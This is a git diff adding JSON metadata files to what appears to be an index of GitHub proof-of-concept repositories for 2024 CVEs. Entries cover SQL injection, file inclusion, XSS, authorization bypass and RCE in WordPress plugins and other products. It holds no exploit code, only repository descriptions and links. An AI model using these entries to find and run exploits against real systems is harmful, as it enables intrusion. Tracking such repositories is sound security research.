"https:\/\/avatars.githubusercontent.com\/u\/192799473?v=4", + "html_url": "https:\/\/github.com\/Rehan07-Human", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rehan07-Human\/Exploiting-RCE-Cyber_Project_CVE-2024-1212", + "description": "Demonstrating the exploitation of the Remote Code Execution (RCE) vulnerability in Kemp LoadMaster (CVE-2024-1212). This project covers reconnaissance, vulnerability scanning using Nuclei, and exploitation processes, while also highlighting mitigation strategies to secure affected systems", + "fork": false, + "created_at": "2024-12-25T14:33:25Z", + "updated_at": "2024-12-26T16:22:14Z", + "pushed_at": "2024-12-25T14:39:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12155.json b/2024/CVE-2024-12155.json new file mode 100644 index 0000000000..0aef757853 --- /dev/null +++ b/2024/CVE-2024-12155.json @@ -0,0 +1,33 @@ +[ + { + "id": 899528238, + "name": "CVE-2024-12155", + "full_name": "McTavishSue\/CVE-2024-12155", + "owner": { + "login": "McTavishSue", + "id": 186207823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186207823?v=4", + "html_url": "https:\/\/github.com\/McTavishSue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/McTavishSue\/CVE-2024-12155", + "description": "CVE-2024-12155 Missing Authorization (CWE-862)", + "fork": false, + "created_at": "2024-12-06T13:03:09Z", + "updated_at": "2024-12-14T20:28:42Z", + "pushed_at": "2024-12-06T13:13:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12172.json b/2024/CVE-2024-12172.json new file mode 100644 index 0000000000..35c27e487d --- /dev/null +++ b/2024/CVE-2024-12172.json @@ -0,0 +1,36 @@ +[ + { + "id": 904457773, + "name": "CVE-2024-12172", + "full_name": "RandomRobbieBF\/CVE-2024-12172", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-12172", + "description": "WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses <= 3.2.21 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Meta Update", + "fork": false, + "created_at": "2024-12-16T23:39:17Z", + "updated_at": "2025-01-06T13:18:45Z", + "pushed_at": "2024-12-16T23:40:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-12172", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12209.json b/2024/CVE-2024-12209.json new file mode 100644 index 0000000000..4bd1299bf6 --- /dev/null +++ b/2024/CVE-2024-12209.json @@ -0,0 +1,64 @@ +[ + { + "id": 900744942, + "name": "CVE-2024-12209", + "full_name": "RandomRobbieBF\/CVE-2024-12209", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-12209", + "description": "WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Unauthenticated Local File Inclusion", + "fork": false, + "created_at": "2024-12-09T11:51:10Z", + "updated_at": "2024-12-11T03:22:18Z", + "pushed_at": "2024-12-09T11:52:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 907641379, + "name": "CVE-2024-12209", + "full_name": "Nxploited\/CVE-2024-12209", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-12209", + "description": "Unauthenticated Local File Inclusion", + "fork": false, + "created_at": "2024-12-24T03:59:15Z", + "updated_at": "2025-01-01T02:56:57Z", + "pushed_at": "2024-12-24T04:19:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12270.json b/2024/CVE-2024-12270.json new file mode 100644 index 0000000000..e7a0456e49 --- /dev/null +++ b/2024/CVE-2024-12270.json @@ -0,0 +1,33 @@ +[ + { + "id": 900786065, + "name": "CVE-2024-12270", + "full_name": "RandomRobbieBF\/CVE-2024-12270", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-12270", + "description": "Beautiful Taxonomy Filters <= 2.4.3 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-12-09T13:22:10Z", + "updated_at": "2024-12-09T17:13:59Z", + "pushed_at": "2024-12-09T13:24:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12345.json b/2024/CVE-2024-12345.json new file mode 100644 index 0000000000..193a6f74ec --- /dev/null +++ b/2024/CVE-2024-12345.json @@ -0,0 +1,33 @@ +[ + { + "id": 896006811, + "name": "CVE-2024-12345-POC", + "full_name": "RoyaRadin\/CVE-2024-12345-POC", + "owner": { + "login": "RoyaRadin", + "id": 190079804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/190079804?v=4", + "html_url": "https:\/\/github.com\/RoyaRadin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RoyaRadin\/CVE-2024-12345-POC", + "description": null, + "fork": false, + "created_at": "2024-11-29T11:04:57Z", + "updated_at": "2024-11-29T11:04:58Z", + "pushed_at": "2024-11-29T11:04:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12356.json b/2024/CVE-2024-12356.json new file mode 100644 index 0000000000..a168fab26d --- /dev/null +++ b/2024/CVE-2024-12356.json @@ -0,0 +1,33 @@ +[ + { + "id": 904790391, + "name": "CVE-2024-12356", + "full_name": "cloudefence\/CVE-2024-12356", + "owner": { + "login": "cloudefence", + "id": 189002472, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/189002472?v=4", + "html_url": "https:\/\/github.com\/cloudefence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cloudefence\/CVE-2024-12356", + "description": "CVE-2024-12356: Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)", + "fork": false, + "created_at": "2024-12-17T15:01:37Z", + "updated_at": "2025-01-03T13:01:56Z", + "pushed_at": "2024-12-17T15:31:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12484.json b/2024/CVE-2024-12484.json new file mode 100644 index 0000000000..4fa5b19008 --- /dev/null +++ b/2024/CVE-2024-12484.json @@ -0,0 +1,33 @@ +[ + { + "id": 900580012, + "name": "CVE-2024-12484", + "full_name": "LiChaser\/CVE-2024-12484", + "owner": { + "login": "LiChaser", + "id": 127033061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127033061?v=4", + "html_url": "https:\/\/github.com\/LiChaser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LiChaser\/CVE-2024-12484", + "description": "CVE-poc", + "fork": false, + "created_at": "2024-12-09T04:42:19Z", + "updated_at": "2024-12-24T08:49:04Z", + "pushed_at": "2024-12-09T05:56:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1269.json b/2024/CVE-2024-1269.json new file mode 100644 index 0000000000..b2f186c5d1 --- /dev/null +++ b/2024/CVE-2024-1269.json @@ -0,0 +1,33 @@ +[ + { + "id": 758902920, + "name": "CVE-2024-1269", + "full_name": "sajaljat\/CVE-2024-1269", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-1269", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-17T12:21:17Z", + "updated_at": "2024-02-17T12:21:18Z", + "pushed_at": "2024-02-17T12:21:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12849.json b/2024/CVE-2024-12849.json new file mode 100644 index 0000000000..fb01f03101 --- /dev/null +++ b/2024/CVE-2024-12849.json @@ -0,0 +1,64 @@ +[ + { + "id": 913331319, + "name": "CVE-2024-12849", + "full_name": "RandomRobbieBF\/CVE-2024-12849", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-12849", + "description": "Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Unauthenticated Arbitrary File Read", + "fork": false, + "created_at": "2025-01-07T13:32:30Z", + "updated_at": "2025-01-07T13:33:13Z", + "pushed_at": "2025-01-07T13:33:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 913426666, + "name": "CVE-2024-12849-Poc", + "full_name": "Nxploited\/CVE-2024-12849-Poc", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-12849-Poc", + "description": null, + "fork": false, + "created_at": "2025-01-07T16:57:48Z", + "updated_at": "2025-01-07T17:20:00Z", + "pushed_at": "2025-01-07T17:19:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12883.json b/2024/CVE-2024-12883.json new file mode 100644 index 0000000000..7c1728cbbf --- /dev/null +++ b/2024/CVE-2024-12883.json @@ -0,0 +1,33 @@ +[ + { + "id": 772273310, + "name": "cve-2024-12883", + "full_name": "mhtsec\/cve-2024-12883", + "owner": { + "login": "mhtsec", + "id": 83952182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83952182?v=4", + "html_url": "https:\/\/github.com\/mhtsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhtsec\/cve-2024-12883", + "description": null, + "fork": false, + "created_at": "2024-03-14T21:40:40Z", + "updated_at": "2024-03-14T21:40:41Z", + "pushed_at": "2024-03-14T21:40:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12970.json b/2024/CVE-2024-12970.json new file mode 100644 index 0000000000..3c6933311a --- /dev/null +++ b/2024/CVE-2024-12970.json @@ -0,0 +1,33 @@ +[ + { + "id": 911569071, + "name": "CVE-2024-12970", + "full_name": "osmancanvural\/CVE-2024-12970", + "owner": { + "login": "osmancanvural", + "id": 123651825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123651825?v=4", + "html_url": "https:\/\/github.com\/osmancanvural", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osmancanvural\/CVE-2024-12970", + "description": null, + "fork": false, + "created_at": "2025-01-03T10:23:44Z", + "updated_at": "2025-01-03T10:23:47Z", + "pushed_at": "2025-01-03T10:23:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12986.json b/2024/CVE-2024-12986.json new file mode 100644 index 0000000000..da2fc44437 --- /dev/null +++ b/2024/CVE-2024-12986.json @@ -0,0 +1,33 @@ +[ + { + "id": 912059429, + "name": "CVE-2024-12986", + "full_name": "Aether-0\/CVE-2024-12986", + "owner": { + "login": "Aether-0", + "id": 143575444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143575444?v=4", + "html_url": "https:\/\/github.com\/Aether-0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aether-0\/CVE-2024-12986", + "description": null, + "fork": false, + "created_at": "2025-01-04T14:47:09Z", + "updated_at": "2025-01-07T00:35:54Z", + "pushed_at": "2025-01-04T14:58:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1301.json b/2024/CVE-2024-1301.json new file mode 100644 index 0000000000..b11fdefa58 --- /dev/null +++ b/2024/CVE-2024-1301.json @@ -0,0 +1,33 @@ +[ + { + "id": 754535047, + "name": "CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection", + "full_name": "guillermogm4\/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection", + "description": "POC Badgermeter moni tool - CVE-2024-1301", + "fork": false, + "created_at": "2024-02-08T09:08:05Z", + "updated_at": "2024-03-06T17:58:31Z", + "pushed_at": "2024-02-08T09:50:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1302.json b/2024/CVE-2024-1302.json new file mode 100644 index 0000000000..4fcab233ad --- /dev/null +++ b/2024/CVE-2024-1302.json @@ -0,0 +1,33 @@ +[ + { + "id": 754542610, + "name": "CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure", + "full_name": "guillermogm4\/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure", + "description": "POC Badgermeter moni tool - CVE-2024-1302", + "fork": false, + "created_at": "2024-02-08T09:27:53Z", + "updated_at": "2024-03-06T17:58:22Z", + "pushed_at": "2024-02-08T09:55:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1303.json b/2024/CVE-2024-1303.json new file mode 100644 index 0000000000..e413a5547c --- /dev/null +++ b/2024/CVE-2024-1303.json @@ -0,0 +1,33 @@ +[ + { + "id": 754543116, + "name": "CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal", + "full_name": "guillermogm4\/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal", + "description": "POC Badgermeter moni tool - CVE-2024-1303", + "fork": false, + "created_at": "2024-02-08T09:29:14Z", + "updated_at": "2024-03-06T17:58:14Z", + "pushed_at": "2024-02-08T10:00:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1304.json b/2024/CVE-2024-1304.json new file mode 100644 index 0000000000..7850a5d6b3 --- /dev/null +++ b/2024/CVE-2024-1304.json @@ -0,0 +1,33 @@ +[ + { + "id": 754543376, + "name": "CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS", + "full_name": "guillermogm4\/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS", + "description": "POC Badgermeter moni tool - CVE-2024-1304", + "fork": false, + "created_at": "2024-02-08T09:29:54Z", + "updated_at": "2024-03-06T17:56:15Z", + "pushed_at": "2024-02-08T10:03:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1346.json b/2024/CVE-2024-1346.json new file mode 100644 index 0000000000..81731133ed --- /dev/null +++ b/2024/CVE-2024-1346.json @@ -0,0 +1,33 @@ +[ + { + "id": 763037615, + "name": "CVE-2024-1346", + "full_name": "PeterGabaldon\/CVE-2024-1346", + "owner": { + "login": "PeterGabaldon", + "id": 34518201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34518201?v=4", + "html_url": "https:\/\/github.com\/PeterGabaldon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterGabaldon\/CVE-2024-1346", + "description": "Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.", + "fork": false, + "created_at": "2024-02-25T11:51:03Z", + "updated_at": "2024-03-19T03:13:08Z", + "pushed_at": "2024-02-25T11:55:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1380.json b/2024/CVE-2024-1380.json new file mode 100644 index 0000000000..b886e4ddb0 --- /dev/null +++ b/2024/CVE-2024-1380.json @@ -0,0 +1,33 @@ +[ + { + "id": 863002188, + "name": "CVE-2024-1380", + "full_name": "RandomRobbieBF\/CVE-2024-1380", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-1380", + "description": "Relevanssi – A Better Search <= 4.22.0 - Missing Authorization to Unauthenticated Query Log Export", + "fork": false, + "created_at": "2024-09-25T14:49:00Z", + "updated_at": "2024-10-18T17:57:34Z", + "pushed_at": "2024-09-25T14:50:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1403.json b/2024/CVE-2024-1403.json new file mode 100644 index 0000000000..5859db73c6 --- /dev/null +++ b/2024/CVE-2024-1403.json @@ -0,0 +1,33 @@ +[ + { + "id": 768162174, + "name": "CVE-2024-1403", + "full_name": "horizon3ai\/CVE-2024-1403", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-1403", + "description": "Progress OpenEdge Authentication Bypass", + "fork": false, + "created_at": "2024-03-06T15:27:18Z", + "updated_at": "2024-11-21T14:01:53Z", + "pushed_at": "2024-03-06T15:31:56Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 15, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1441.json b/2024/CVE-2024-1441.json new file mode 100644 index 0000000000..da1d2a9f30 --- /dev/null +++ b/2024/CVE-2024-1441.json @@ -0,0 +1,33 @@ +[ + { + "id": 787252981, + "name": "CVE-2024-1441", + "full_name": "almkuznetsov\/CVE-2024-1441", + "owner": { + "login": "almkuznetsov", + "id": 96069812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96069812?v=4", + "html_url": "https:\/\/github.com\/almkuznetsov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/almkuznetsov\/CVE-2024-1441", + "description": null, + "fork": false, + "created_at": "2024-04-16T07:14:33Z", + "updated_at": "2024-04-25T09:15:04Z", + "pushed_at": "2024-04-25T09:15:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1512.json b/2024/CVE-2024-1512.json new file mode 100644 index 0000000000..e04291a5d8 --- /dev/null +++ b/2024/CVE-2024-1512.json @@ -0,0 +1,33 @@ +[ + { + "id": 765658440, + "name": "CVE-2024-1512", + "full_name": "rat-c\/CVE-2024-1512", + "owner": { + "login": "rat-c", + "id": 89196953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89196953?v=4", + "html_url": "https:\/\/github.com\/rat-c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rat-c\/CVE-2024-1512", + "description": "PoC for CVE-2024-1512 in MasterStudy LMS WordPress Plugin.", + "fork": false, + "created_at": "2024-03-01T11:08:37Z", + "updated_at": "2024-09-25T18:00:24Z", + "pushed_at": "2024-03-01T11:18:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1561.json b/2024/CVE-2024-1561.json new file mode 100644 index 0000000000..08747a050a --- /dev/null +++ b/2024/CVE-2024-1561.json @@ -0,0 +1,64 @@ +[ + { + "id": 799218200, + "name": "CVE-2024-1561", + "full_name": "DiabloHTB\/CVE-2024-1561", + "owner": { + "login": "DiabloHTB", + "id": 124635368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124635368?v=4", + "html_url": "https:\/\/github.com\/DiabloHTB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DiabloHTB\/CVE-2024-1561", + "description": "Poc for CVE-2024-1561 affecting Gradio 4.12.0", + "fork": false, + "created_at": "2024-05-11T13:44:46Z", + "updated_at": "2024-11-13T20:59:00Z", + "pushed_at": "2024-05-11T13:58:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799663993, + "name": "Nuclei-Template-CVE-2024-1561", + "full_name": "DiabloHTB\/Nuclei-Template-CVE-2024-1561", + "owner": { + "login": "DiabloHTB", + "id": 124635368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124635368?v=4", + "html_url": "https:\/\/github.com\/DiabloHTB", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DiabloHTB\/Nuclei-Template-CVE-2024-1561", + "description": "Nuclei Templates ", + "fork": false, + "created_at": "2024-05-12T19:55:53Z", + "updated_at": "2024-05-12T20:24:09Z", + "pushed_at": "2024-05-12T20:17:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1642470.json b/2024/CVE-2024-1642470.json new file mode 100644 index 0000000000..113c6a236f --- /dev/null +++ b/2024/CVE-2024-1642470.json @@ -0,0 +1,33 @@ +[ + { + "id": 787003431, + "name": "CVE-2024-1642470", + "full_name": "Symbolexe\/CVE-2024-1642470", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2024-1642470", + "description": "CVE-2024-1642470 is a critical vulnerability discovered in the Windows USB Generic Parent Driver. The vulnerability arises due to improper input validation within the driver's IOCTL handling mechanism. As a result, remote attackers can execute arbitrary code via crafted IOCTL requests, potentially leading to system compromise.", + "fork": false, + "created_at": "2024-04-15T17:51:59Z", + "updated_at": "2024-06-05T16:10:03Z", + "pushed_at": "2024-04-15T17:54:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1651.json b/2024/CVE-2024-1651.json new file mode 100644 index 0000000000..d87c7972e3 --- /dev/null +++ b/2024/CVE-2024-1651.json @@ -0,0 +1,99 @@ +[ + { + "id": 762235697, + "name": "CVE-2024-1651-PoC", + "full_name": "sharpicx\/CVE-2024-1651-PoC", + "owner": { + "login": "sharpicx", + "id": 44630640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44630640?v=4", + "html_url": 